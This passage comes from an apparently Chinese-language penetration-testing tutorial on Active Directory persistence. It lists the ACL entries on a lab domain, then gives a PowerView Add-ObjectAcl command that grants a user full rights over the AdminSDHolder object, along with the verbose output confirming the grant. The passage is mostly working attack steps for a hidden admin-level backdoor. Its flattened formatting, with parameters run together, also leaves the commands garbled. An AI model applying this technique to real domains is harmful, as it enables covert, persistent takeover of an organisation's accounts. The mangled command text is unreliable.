IdentityReference ----------------- NT AUTHORITY\Authenticated Users NT AUTHORITY\SYSTEM BUILTIN\Administrators XIAOMI\Domain Admins XIAOMI\Enterprise Admins Everyone NT AUTHORITY\SELF NT AUTHORITY\SELF BUILTIN\Pre-Windows2000 Compatible Access BUILTIN\Pre-Windows2000 Compatible Access BUILTIN\Pre-Windows2000 Compatible Access BUILTIN\Pre-Windows2000 Compatible Access BUILTIN\Pre-Windows2000 Compatible Access BUILTIN\Pre-Windows2000 Compatible Access BUILTIN\Pre-Windows2000 Compatible Access BUILTIN\Pre-Windows2000 Compatible Access BUILTIN\Pre-Windows2000 Compatible Access BUILTIN\Pre-Windows2000 Compatible Access BUILTIN\Pre-Windows2000 Compatible Access BUILTIN\Windows Authorization Access Group BUILTIN\Terminal Server License Servers BUILTIN\Terminal Server License Servers XIAOMI\Cert Publishers
2.向AdminSDHolder对象添加ACL
添加用户xiaomi的完全访问权限,命令如下:
1 2
Import-Module .\PowerView.ps1 Add-ObjectAcl-TargetADSprefix'CN=AdminSDHolder,CN=System'-PrincipalSamAccountName xiaomi -Verbose-Rights All
注意:本文提到的百度社区参考链接此处存在问题。是Rights不是文中提到的Right
真实测试情况
1 2 3 4 5 6 7 8
PS C:\Users\Administrator\Desktop\mimikatz_trunk> Add-ObjectAcl-TargetADSprefix'CN=AdminSDHolder,CN=System'-Principal SamAccountName xiaomi -Verbose-Rights All 详细信息: Get-DomainSearcher search string: LDAP://CN=AdminSDHolder,CN=System,DC=xiaomi,DC=org 详细信息: Get-DomainSearcher search string: LDAP://DC=xiaomi,DC=org 详细信息: Granting principal S-1-5-21-3576461989-1381017913-248049510-1104'All' on CN=AdminSDHolder,CN=System,DC=xiaomi,DC=org 详细信息: Granting principal S-1-5-21-3576461989-1381017913-248049510-1104'00000000-0000-0000-0000-000000000000' rights on CN=AdminSDHolder,CN=System,DC=xiaomi,DC=org